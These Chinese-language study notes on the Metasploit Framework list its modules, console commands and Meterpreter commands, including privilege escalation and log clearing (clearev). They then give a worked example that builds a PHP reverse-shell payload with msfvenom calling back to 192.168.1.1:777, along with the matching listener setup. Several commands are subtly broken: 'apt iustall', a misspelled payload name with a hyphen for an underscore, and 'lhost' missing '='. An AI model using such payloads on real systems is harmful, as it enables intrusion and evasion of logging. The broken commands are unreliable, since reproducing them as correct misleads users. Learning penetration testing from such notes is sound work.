MSF学习笔记

一、简介

  • Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。
  • 刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。、

二、使用

1、安装

  • MSF默认在Kali上安装。但也支持安装在其他设备上,推荐使用Ubuntu安装:apt iustall metasploit-framework

2、MSF核心模块

  • Exploits——利用模块
  • Payloads——攻击载荷漏洞
    • Payloads模块补充内容(可分为三个部分)
    • Single :完整独立的Payload
    • stager :用于建立连接和下载
    • stage :Stager连接后下载的Payload
  • Auxiliary——辅助模块
  • Post——后渗透模块
  • Encoders——编码模块
  • Evasion——免杀模块
  • Nops——空模块

3、MSF基本命令

  • msfconsole:启动MSF终端
  • banner:展示banner
  • help /?:查看帮助
  • search :搜索漏洞和利用数据库
  • info:查看模块信息
  • use :使用模块
  • show options:查看模块需要配置的参数
  • set :设置参数值
  • runexploit :执行模块
  • back : 返回主页面
  • quit/exit : 退出MSF

4、Metepreter基本命令

命令解释
sysinfo查看目标机器系统信息
getuid查看用户
pwd / getlwd查看当前目录
cd / lcd切换目录
background把当前会话放到后台
session -i id切换到指定对话
session -k id杀死指定对话
shell进入目标主机shell
upload file向目标主机上传文件
download file从目标主机下载文件
search在目标主机上搜索文件
execute在目标主机上执行程序
getsystem提权
clearev清除操作痕迹

5、使用案例

  • 生成马儿(msfvenom:用于生成各种payload)——注意:后续需要MSF启动监听才有效
    • PHP马,回连地址192.168.1.1,回连端口777,生成文件为shell.php
    • msfvenom -p php/metepreter/reverse-tcp lhost 192.168.1.1 lport 777 -o shell.php
  • MSF监听:
    • use exploit/multi/handler
    • set payload php/metepreter/reverse-tcp 注意:payload需要同马儿的一致
    • set lhost 192.168.1.1
    • set lport 777
    • run

三、额外补充

1、渗透测试的术语

  • 漏洞:Vulnerability
  • 利用:Exploit
  • 提权:Privailege Escalation
  • 攻击载荷:Payload
  • 免杀:Anti-AntiVirus
  • 后渗透:Post-Exploitation
  • 渗透测试:Penatration Test

2、渗透测试流程

image-20221109220600839

3、一些渗透测试工具

© 版权声明
THE END
喜欢就支持一下吧
点赞9赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容